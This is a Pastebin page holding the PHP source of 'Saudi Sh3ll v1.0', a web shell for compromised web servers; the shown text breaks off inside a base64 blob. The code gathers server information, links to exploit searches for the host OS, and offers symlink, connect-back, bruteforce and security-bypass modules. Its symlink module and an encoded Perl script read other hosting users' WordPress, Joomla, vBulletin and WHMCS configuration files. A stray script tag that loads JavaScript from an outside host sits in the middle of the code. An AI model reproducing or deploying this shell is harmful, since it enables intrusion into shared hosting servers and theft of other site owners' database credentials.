This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!

saudi_sh3ll_v1.0

By: djcamoable1 on Oct 6th, 2012  |  syntax: None  |  size: 85.74 KB  |  views: 76  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?
  2. ob_start();
  3. ?>
  4.  
  5. <?php
  6. ########################################\
  7. #                                        #
  8. #            Saudi Sh3ll v1.0            #
  9. #                                        #
  10. #             by al-swisre               #
  11. #                                        #
  12. ########################################/
  13.  
  14.  
  15. $auth = 1;
  16. $name='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  17. $pass='ec371748dc2da624b35a4f8f685dd122'; // Saudi
  18. if($auth == 1) {
  19. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  20.    {
  21.    header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
  22.    header('HTTP/1.0 401 Unauthorized');
  23.    exit("<b></b>");
  24.    }
  25. }
  26. ?>
  27.  
  28.  
  29. <?
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36. @set_time_limit(0);
  37. @error_reporting(0);
  38.  
  39.  
  40. if ($_GET['sws']== 'phpinfo')
  41. {
  42.  
  43. echo @phpinfo();
  44.  
  45. exit;
  46.  
  47. }
  48.  
  49.  
  50.  
  51. echo '
  52.  
  53.  
  54. <title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
  55. <meta http-equiv="content=type"  content="text/html; charset=utf-8" />
  56.  
  57.  
  58.  
  59.  
  60.  
  61. <style type="text/css">
  62.   html,body {
  63.      margin-top: 5px ;
  64.      padding: 0;
  65.      outline: 0;
  66. }
  67.  
  68.  
  69. body {
  70.  
  71.     direction: ltr;
  72.     background-color: #000000;
  73.     color: #CCCCCC;
  74.     font-family: Tahoma, Arial, sans-serif;
  75.     font-weight: bold;
  76.     text-align: center ;
  77. }
  78.  
  79. input,textarea,select{
  80. font-weight: bold;
  81. color: #FFFFFF;
  82. dashed #ffffff;
  83. border: 1px dotted #003300;
  84. background-color: black;
  85. padding: 3px
  86. }
  87.  
  88. input:hover{
  89. box-shadow:0px 0px 4px #009900;
  90.  
  91. }
  92. .cont a
  93.  
  94. {
  95.  
  96.  
  97. text-decoration: none;
  98. color: #FFFFFF;
  99.  
  100.  
  101.  
  102. }
  103. .hedr
  104. {
  105. font-size:32px;
  106. color: #009900;
  107. text-shadow: 0px 0px 4px #003300 ;
  108.  
  109.  
  110.  
  111. }
  112.  
  113.  
  114.  
  115. .td1{
  116.  
  117.  
  118.     border: 1px dotted #022B04;
  119.     padding: 8px;
  120.     border-radius: 20px;
  121.     text-shadow: 0px 0px 2px #003300;
  122.     font-size: 10px;
  123.     font-family: Tahoma;
  124.     font-weight: bold;
  125.  
  126. }
  127.  
  128. .td1 tr{}
  129.  
  130. .lol{
  131.   text-align: left;
  132.   float: left;
  133.   background: #990000;
  134. }
  135. .nop{
  136.  
  137. width: 180px;
  138. text-align: center;
  139. font-size: 15px;
  140. font-family:Tahoma;
  141. color: #003300;
  142.  
  143.  
  144.  
  145. }
  146. .nop a{
  147.   text-decoration: none;
  148.   color: #003300 ;
  149.   text-shadow: none;
  150.   width: 80px;
  151.   padding: 8px
  152.  
  153.  
  154. }
  155. .nop a:hover{
  156.   color: #FFFFFF;
  157.  box-shadow: 0px 0px 4px #006600 ;
  158.  
  159.  
  160.  
  161.   }
  162. a
  163. {
  164. text-decoration: none;
  165. color: #006600;
  166.  
  167. }
  168.  
  169.  
  170. .tmp tr td:hover{
  171.  
  172. box-shadow: 0px 0px 4px #EEEEEE;
  173.  
  174. }
  175. .fot{
  176.  
  177. font-family:Tahoma, Arial, sans-serif;
  178.  
  179.   font-size: 13pt;
  180. }
  181.  
  182. .ir {
  183.   color: #FF0000;
  184. }
  185.  
  186. .cont
  187. {
  188. float:right;
  189. color: #FFFFFF;
  190. box-shadow: 0px 0px 4px #003300;
  191. font-size: 13px;
  192. padding: 8px
  193.  
  194. }
  195.  
  196. .cont a{
  197.  
  198.  text-decoration: none;
  199.  color: #FFFFFF;
  200.  font-family: Tahoma, Arial, sans-serif  ;
  201.  font-size: 13px;
  202.  text-shadow: 0px 0px 3px ;
  203. }
  204.  
  205. .cont a:hover{
  206.  
  207.  
  208.   color: #FF0000 ;
  209.   text-shadow:0px 0px 3px #FF0000 ;
  210.  
  211.  
  212. }
  213.  
  214. .cont3
  215. {
  216. color: #FFFFFF;
  217. font-size: 15px;
  218. padding: 8px
  219.  
  220. }
  221.  
  222. .cont3 a{
  223.  
  224.  text-decoration: none;
  225.  color: #FFFFFF;
  226.  font-family: Tahoma, Arial, sans-serif  ;
  227.  font-size: 15px;
  228.  text-shadow: 0px 0px 3px ;
  229. }
  230.  
  231. .cont3 a:hover{
  232.  
  233.  
  234.   color: #FF0000 ;
  235.   text-shadow:0px 0px 3px #FF0000 ;
  236.  
  237.  
  238. }
  239.  
  240. .tmp tr td{
  241.  
  242. border: dotted 1px #003300;
  243.  
  244. padding: 4px ;
  245. font-size: 14px;
  246. }
  247.  
  248. .tmp tr td a {
  249.   text-decoration: none;
  250.  
  251. }
  252. .cmd
  253. {
  254.  
  255. float:right;
  256.  
  257. }
  258.  .tbm{
  259.  font-size: 14px;
  260. }
  261.  
  262. .tbm tr td{
  263.  border: dashed 1px #111111;
  264.  
  265. }
  266. .hr{
  267.  
  268. border: dotted 1px #003300;
  269. padding: 5px ;
  270. font-size: 13px;
  271. color: white ;
  272. text-shadow: 0px 0px 3px ;
  273. }
  274.  
  275. .hr2{
  276.  
  277. border: dotted 1px #003300;
  278. padding: 5px ;
  279. font-size: 13px;
  280. color: red ;
  281. text-shadow: 0px 0px 3px ;
  282. }
  283.  
  284. .t3p{
  285. width: 100%;
  286.  
  287. }
  288.  
  289. .t3p{margin-left: 45px ;}
  290.  
  291. .t33p{margin-left: 45px ;}
  292.  
  293.  
  294. .t3p tr td{
  295.  
  296. border:  solid 1px #002F00;
  297. padding: 2px ;
  298. font-size: 13px;
  299. text-align: center ;
  300. font-weight: bold;
  301. margin-left: 20px ;
  302.  
  303. }
  304. .t3p tr td:hover{
  305.  
  306. box-shadow: 0px 0px 4px #009900;
  307.  
  308. }
  309.  
  310.  
  311. .info {margin-left: 100px ; }
  312.  
  313. .info tr td
  314. {
  315.  
  316. border:  solid 1px #002F00;
  317. padding: 5px ;
  318. font-size: 13px;
  319. text-align: center ;
  320. font-weight: bold;
  321.  
  322.  
  323. }
  324. .conn{width: 70%;}
  325.  
  326. .conn tr td{
  327. border: 1px dashed #003300;
  328. padding: 5px ;
  329. font-size: 13px;
  330. text-align: center ;
  331. font-weight: bold;
  332.  
  333. }
  334.  
  335.  
  336. .lol a{
  337.  
  338. font-size: 10px;
  339.  
  340. }
  341.  
  342. .d0n{
  343. width: 90%;
  344. border-top:  solid 1px #003300;
  345.  
  346. }
  347. .d0n tr td{
  348. font-weight: bold;
  349. color: #FFFFFF;
  350.  font-family: Tahoma, Arial, sans-serif  ;
  351.  font-size: 13px;
  352.  margin-left: 110px ;
  353.  
  354.  
  355. }
  356. .site
  357. {
  358.  
  359. font-weight: bold;
  360. width: 50%;
  361. box-shadow: 0px 0px 2px #003300;
  362.  
  363.  
  364. }
  365.  
  366. .ab
  367. {
  368. box-shadow: 0px 0px 6px #444444;
  369. width: 70%;
  370. padding: 10px ;
  371.  
  372. }
  373.  
  374. .ab tr td
  375. {
  376. text-align: center ;
  377. font-weight: bold;
  378.  font-family: Tahoma, Arial, sans-serif  ;
  379.   font-size: 13px;
  380.  color: white;
  381.   text-shadow: 0px 0px 2px white ;
  382.  
  383.  
  384. }
  385. .ab tr td b
  386. {
  387. color:red ;
  388. text-shadow: 0px 0px 2px red ;
  389. }
  390. .ab tr td a
  391. {
  392.  color: white;
  393.   text-shadow: 0px 0px 2px white ;
  394.  
  395. }
  396. .ab tr td a:hover
  397. {
  398. color:#006600 ;
  399. text-shadow: none ;
  400. }
  401.  
  402. .bru
  403. {
  404. color: #FFFFFF;
  405. font-family: Tahoma, Arial, sans-serif  ;
  406. font-size: 14px;
  407. text-shadow: 0px 0px 3px #000000 ;
  408.  
  409. }
  410.  
  411. .foter
  412. {
  413.  
  414. color: #003300;
  415.  font-family: Tahoma, Arial, sans-serif  ;
  416.  font-size: 11px;
  417.  text-shadow: 0px 0px 3px #000000 ;
  418.  
  419.  
  420. }
  421.  
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428. </style>
  429.  
  430. ';
  431.  
  432. echo '
  433.  
  434. <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
  435.  
  436.                         <td width="15%" valign="top" rowspan="2">
  437.             <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
  438.              </td>
  439.  
  440.         <td height="100" align="left" class="td1"   >
  441.  
  442. ';
  443.  
  444. $pg = basename(__FILE__);
  445.  
  446. echo "OS : <b><font color=green>";
  447. $safe_mode = @ini_get('safe_mode');
  448. $dir = @getcwd();
  449. $ip=$_SERVER['REMOTE_ADDR'];
  450. $ips=$_SERVER['SERVER_ADDR'];
  451. define('SWS','al-swisre');
  452.  
  453. if ($os)
  454. {
  455.  
  456.  
  457. }
  458. else
  459. {
  460.   $os = @php_uname();
  461.   echo $os ;
  462. }
  463. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
  464. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
  465. echo "</font><br /></b>";
  466.  
  467. echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
  468. echo "<br />disable_functions : ";
  469. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
  470.  
  471.  
  472. echo "<font color=red>$df</font></b>";
  473. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  474. }
  475.  
  476. echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
  477.  
  478. echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
  479.  
  480.  
  481. echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
  482.  
  483. echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
  484.  
  485.  
  486. echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
  487.  
  488.  | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
  489.  
  490. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
  491. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
  492.  
  493.  
  494.  
  495.  
  496.  
  497.  
  498.  
  499.  
  500.  
  501.  echo "
  502. <br />
  503.  
  504.  
  505.  
  506.  
  507.  
  508.  
  509.  
  510.  
  511.         </tr>
  512.         </table>
  513.  
  514. <table cellspacing='0' cellpadding='0'  style=' margin:9px'>
  515.  
  516.     <tr>
  517.                         <td  rowspan='2' class='td1' valign='top' >
  518.  
  519.  
  520.         <div class='nop'>
  521.  
  522.          <br /><a href='$pg' >File Manager</a> <br /> <br />
  523.          <a href='$pg?sws=info' >More info</a> <br /><br />
  524.          <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
  525.          <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
  526.          <a href='$pg?sws=sm' >Symlink</a> <br /><br />
  527.          <a href='$pg?sws=con' >Connect Back</a> <br /><br />
  528.          <a href='?sws=brt' >BruteForce</a> <br /><br />
  529.          <a href='$pg?sws=ab' >About Por</a> <br />
  530.  
  531.  
  532.  
  533.         </div>
  534.  
  535.     ";
  536.  
  537.  
  538.  
  539.  
  540.  
  541. echo '
  542.  
  543. <td  height="444" width="82%"  align="center" valign="top">
  544.  
  545. ';
  546.  
  547.  
  548. if(isset($_REQUEST['sws']))
  549. {
  550.  
  551. switch ($_REQUEST['sws'])
  552. {
  553.  
  554.  
  555. ////////////////////////////////////////////////// Symlink //////////////////////////////////////
  556.  
  557. case 'sm':
  558.  
  559. $sws = 'al-swisre' ;
  560.  
  561. $mk = @mkdir('sym',0777);
  562.  
  563.  
  564.  
  565. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  566. $f =@fopen ('sym/.htaccess','w');
  567.  
  568.  
  569. @fwrite($f , $htcs);
  570.  
  571.  
  572. $sym = @symlink("/","sym/root");
  573.  
  574.  
  575.  
  576.  
  577. $pg = basename(__FILE__);
  578.  
  579.  
  580.  
  581. echo '<div class="cont3">
  582. [ <a href="?sws=sm"> Symlink File </a>]
  583.  
  584. [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
  585.  
  586. [<a href="?sws=sm&sy=sec"> Domains & Script </a>]
  587.  
  588. [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
  589. </div><br /><br />'  ;
  590.  
  591. ////////////////////////////////// file ////////////////////////
  592. $sws = 'al-swisre' ;
  593.  
  594. if(isset($_REQUEST['sy']))
  595. {
  596.  
  597. switch ($_REQUEST['sy'])
  598. {
  599.  
  600.  
  601.  
  602.  
  603.  
  604. /// Domains + Scripts  ///
  605.  
  606. case 'sec':
  607.  
  608.  
  609. $d00m = @file("/etc/named.conf");
  610.  
  611. if(!$d00m)
  612. {
  613. die (" can't read /etc/named.conf");
  614. }
  615. else
  616.  
  617. {
  618. echo "<div class='tmp'>
  619. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  620. foreach($d00m as $dom){
  621.  
  622. if(eregi("zone",$dom)){
  623.  
  624. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  625.  
  626. flush();
  627.  
  628. if(strlen(trim($domsws[1][0])) > 2){
  629.  
  630. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  631.  
  632. ///////////////////////////////////////////////////////////////////////////////////
  633.  
  634. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  635. $wpp=@get_headers($wpl);
  636. $wp=$wpp[0];
  637.  
  638. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  639. $wpp2=@get_headers($wp2);
  640. $wp12=$wpp2[0];
  641.  
  642. ///////////////////////////////
  643.  
  644. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  645. $joo=@get_headers($jo1);
  646. $jo=$joo[0];
  647.  
  648.  
  649. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  650. $joo2=@get_headers($jo2);
  651. $jo12=$joo2[0];
  652.  
  653. ////////////////////////////////
  654.  
  655. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  656. $vbb=@get_headers($vb1);
  657. $vb=$vbb[0];
  658.  
  659. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  660. $vbb2=@get_headers($vb2);
  661. $vb12=$vbb2[0];
  662.  
  663. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  664. $vbb3=@get_headers($vb3);
  665. $vb13=$vbb3[0];
  666.  
  667. /////////////////
  668.  
  669. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  670. $whh2=@get_headers($wh1);
  671. $wh=$whh2[0];
  672.  
  673. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  674. $whh2=@get_headers($wh2);
  675. $wh12=$whh2[0];
  676.  
  677. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  678. $whh3=@get_headers($wh3);
  679. $wh13=$whh3[0];
  680.  
  681. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  682. $whh5=@get_headers($wh5);
  683. $wh15=$whh5[0];
  684.  
  685. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  686. $whh4=@get_headers($wh4);
  687. $wh14=$whh4[0];
  688.  
  689.  
  690.  
  691. ////////////////////////////////////////////////////////////////////////////////
  692.  
  693.  ////////// Wordpress ////////////
  694.  
  695. $pos = strpos($wp, "200");
  696. $config="&nbsp;";
  697.  
  698. if (strpos($wp, "200") == true )
  699. {
  700.  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  701. }
  702. elseif (strpos($wp12, "200") == true)
  703. {
  704.   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  705. }
  706.  
  707. ///////////WHMCS////////
  708.  
  709. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  710. {
  711.   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  712.  
  713. }
  714. elseif (strpos($wh12, "200")  == true)
  715. {
  716.   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  717. }
  718.  
  719. elseif (strpos($wh13, "200")  == true)
  720. {
  721.   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  722.  
  723. }
  724.  
  725. ///////// Joomla to 4 ///////////
  726.  
  727. elseif (strpos($jo, "200")  == true)
  728. {
  729.   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  730. }
  731.  
  732. elseif (strpos($jo12, "200")  == true)
  733. {
  734.   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  735. }
  736.  
  737. //////////vBulletin to 4 ///////////
  738.  
  739. elseif (strpos($vb, "200")  == true)
  740. {
  741.   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  742. }
  743.  
  744. elseif (strpos($vb12, "200")  == true)
  745. {
  746.   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  747. }
  748.  
  749. elseif (strpos($vb13, "200")  == true)
  750. {
  751.   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  752. }
  753.  
  754. else
  755. {
  756.  continue;
  757. }
  758.  
  759. /////////////////////////////////////////////////////////////////////////////////////
  760.  
  761.  
  762.  
  763. $site = $user['name'] ;
  764.  
  765.  
  766.  
  767.  
  768. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  769. <td>".$config."</td></tr>"; flush();
  770. exit;
  771.  
  772. }
  773. }
  774. }
  775. }
  776.  
  777.  
  778.  
  779.  
  780. break;
  781.  
  782.  
  783. /// user + domine + symlink  ///
  784.  
  785. case 'sym':
  786.  
  787. $d00m = @file("/etc/named.conf");
  788.  
  789. if(!$d00m)
  790. {
  791. die (" can't read /etc/named.conf");
  792. }
  793. else
  794.  
  795. {
  796. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  797. foreach($d00m as $dom){
  798.  
  799. if(eregi("zone",$dom)){
  800.  
  801. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  802.  
  803. flush();
  804.  
  805. if(strlen(trim($domsws[1][0])) > 2){
  806.  
  807. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  808.  
  809.  
  810.  
  811. $site = $user['name'] ;
  812.  
  813.  
  814. @symlink("/","sym/root");
  815.  
  816. $site = $domsws[1][0];
  817.  
  818. $ir = 'ir';
  819.  
  820. $il = 'il';
  821.  
  822. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  823. {
  824. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  825. }
  826.  
  827.  
  828. echo "
  829. <tr>
  830.  
  831. <td>
  832. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  833. </td>
  834.  
  835.  
  836. <td>
  837. ".$user['name']."
  838. </td>
  839.  
  840.  
  841.  
  842.  
  843.  
  844.  
  845. <td>
  846. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  847. </td>
  848.  
  849.  
  850. </tr></div> ";
  851.  
  852.  
  853. flush();
  854.  
  855. }
  856. }
  857. }
  858. }
  859.  
  860.  
  861.  
  862.  
  863. break;
  864.  
  865. case 'pl':
  866.  
  867. if (!is_dir('sa2')){
  868.  
  869. $mk = @mkdir('sa2',0777);
  870.  
  871.  
  872.  
  873. if (is_file('sa2/perl.pl'))
  874. {
  875.  
  876.  
  877. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
  878.  
  879.  
  880. @chmod('sa2/perl.pl',0755);
  881.  
  882.  
  883.  
  884.  
  885. }
  886. else
  887. {
  888.  
  889.  
  890.  
  891.  
  892. $f2 =@fopen ('sa2/perl.pl','w');
  893.  
  894.  
  895. $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLi